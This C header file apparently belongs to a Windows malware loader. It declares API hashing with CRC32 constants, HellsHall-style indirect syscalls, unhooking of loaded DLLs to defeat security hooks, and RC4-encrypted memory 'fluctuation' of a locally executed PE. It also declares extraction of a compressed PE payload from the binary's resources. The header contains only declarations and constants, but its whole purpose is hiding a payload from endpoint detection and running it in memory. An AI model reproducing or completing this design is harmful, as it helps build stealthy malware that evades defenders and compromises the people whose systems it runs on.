#pragma once

#include <Windows.h>


#ifndef COMMON_H
#define COMMON_H

#include "FunctionPntrs.h"


// CONSTANTS
#define CRC_POLYNOMIAL                      0xEDB88320      // Used for the CRC string hashing algo
#define STATUS_OBJECT_NAME_NOT_FOUND        0xC0000034      // 'The object name is not found' - Returned by NtOpenSection in unhook.c if the dll is not found in \knowndlls\


// HASHES - Gemerated by HashCalculator
#define NtOpenSection_CRC32                 0x7C850E30
#define NtMapViewOfSection_CRC32            0xB347A7C1
#define NtUnmapViewOfSection_CRC32          0x830A04FC
#define NtAllocateVirtualMemory_CRC32       0x498165AA
#define NtProtectVirtualMemory_CRC32        0x17C9087B
#define NtFlushInstructionCache_CRC32		0x2C4865DD

#define LoadLibraryA_CRC32							0x91377946
#define AddVectoredExceptionHandler_CRC32			0x3B240C19
#define RemoveVectoredExceptionHandler_CRC32		0x00B87BCF
#define SystemFunction032_CRC32						0x7E5326F1
#define VirtualProtect_CRC32						0xA401C9F5
#define RtlAddFunctionTable_CRC32					0x629FE983
#define CreateTimerQueueTimer_CRC32					0xA4B74575
#define CreateTimerQueue_CRC32						0x30CA5314
#define InitializeCriticalSection_CRC32				0xFB24C20A
#define EnterCriticalSection_CRC32					0x3C439593
#define LeaveCriticalSection_CRC32					0xFB44DAA6

#define text_CRC32               0xF205493C
#define advapi32dll_CRC32        0x5F98132B
#define win32udllA_CRC32         0x0D0AF56F
#define win32udllW_CRC32         0x1C630B02
#define ntdlldll_CRC32           0xF87B6F6B
#define kernel32dll_CRC32        0xC4105BC9

//--------------------------------------------------------------------------------------------------------------------------------------------------
// From HellsHall.x

typedef struct _NT_SYSCALL
{
    DWORD dwSSn;                    // Syscall number
    DWORD dwSyscallHash;            // Syscall hash value
    PVOID pSyscallInstAddress;      // Address of a random 'syscall' instruction in win32u.dll    

}NT_SYSCALL, * PNT_SYSCALL;


BOOL			FetchNtSyscall(IN DWORD dwSysHash, OUT PNT_SYSCALL pNtSys);
extern VOID		SetSSn(IN DWORD dwSSn, IN PVOID pSyscallInstAddress);
extern			RunSyscall();

#define SET_SYSCALL(NtSys)(SetSSn((DWORD)NtSys.dwSSn,(PVOID)NtSys.pSyscallInstAddress))

//--------------------------------------------------------------------------------------------------------------------------------------------------
// Global structs

typedef struct _NT_API 
{
    NT_SYSCALL	NtOpenSection;
    NT_SYSCALL	NtMapViewOfSection;
    NT_SYSCALL	NtUnmapViewOfSection;
    NT_SYSCALL  NtAllocateVirtualMemory;
    NT_SYSCALL	NtProtectVirtualMemory;
	NT_SYSCALL	NtFlushInstructionCache;
    BOOL        bInit;

}NT_API, * PNT_API;

typedef struct _WINAPIs 
{
	fnCreateTimerQueueTimer				pCreateTimerQueueTimer;
	fnCreateTimerQueue					pCreateTimerQueue;
	fnAddVectoredExceptionHandler		pAddVectoredExceptionHandler;
	fnRemoveVectoredExceptionHandler	pRemoveVectoredExceptionHandler;
//	fnVirtualProtect					pVirtualProtect;
	fnRtlAddFunctionTable				pRtlAddFunctionTable;
	fnSystemFunction032					pSystemFunction032;
	fnLoadLibraryA						pLoadLibraryA;
	fnInitializeCriticalSection			pInitializeCriticalSection;
	fnEnterCriticalSection				pEnterCriticalSection;
	fnLeaveCriticalSection				pLeaveCriticalSection;

}WINAPIs, *PWINAPIs;

typedef struct _PE_HDRS
{
	PBYTE					pFileBuffer;
	DWORD					dwFileSize;

	PIMAGE_NT_HEADERS		pImgNtHdrs;
	PIMAGE_SECTION_HEADER	pImgSecHdr;

	PIMAGE_DATA_DIRECTORY	pEntryImportDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryBaseRelocDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryTLSDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryExceptionDataDir;
	PIMAGE_DATA_DIRECTORY	pEntryExportDataDir;

	BOOL					bIsDLLFile;
}PE_HDRS, * PPE_HDRS;

//--------------------------------------------------------------------------------------------------------------------------------------------------
// From ApiHashing.c

HMODULE GetModuleHandleH(IN UINT32 uModuleHash);
FARPROC GetProcAddressH(IN HMODULE hModule, IN UINT32 uApiHash);

//--------------------------------------------------------------------------------------------------------------------------------------------------
// From Common.c

BOOL			InitIndirectSyscalls(OUT PNT_API Nt);
BOOL			InitializeWinAPIs(OUT PWINAPIs pWinAPIs);
BOOL			InitializePeStruct(OUT PPE_HDRS pPeHdrs, IN PBYTE pFileBuffer, IN DWORD dwFileSize);
VOID			Wcscat(IN WCHAR* pDest, IN WCHAR* pSource);
VOID			Memcpy(IN PVOID pDestination, IN PVOID pSource, SIZE_T sLength);
UINT32			CRC32B(LPCSTR cString);
unsigned int	GenerateRandomInt();

#define HASH(STR)    ( CRC32B( (LPCSTR)STR ) )

//--------------------------------------------------------------------------------------------------------------------------------------------------
// From Unhook.c

VOID			UnhookAllLoadedDlls();
LONG WINAPI		UnhookingVectoredExceptionHandler(PEXCEPTION_POINTERS pExceptionInfo);

//--------------------------------------------------------------------------------------------------------------------------------------------------
// From LocalPeExec.c

BOOL			LocalPeExecAndFluctuate(IN PPE_HDRS pPeHdrs);
LONG WINAPI		PeFluctuationVectoredExceptionHandler(PEXCEPTION_POINTERS pExceptionInfo);

//--------------------------------------------------------------------------------------------------------------------------------------------------
// From RsrcPayload.c

BOOL GetDecompressedResourcePayload(IN HMODULE hModule, IN WORD wResourceId, OUT PBYTE* ppDecompressedPe, OUT PSIZE_T psDecompressedPeSize);

//--------------------------------------------------------------------------------------------------------------------------------------------------

#endif // !COMMON_H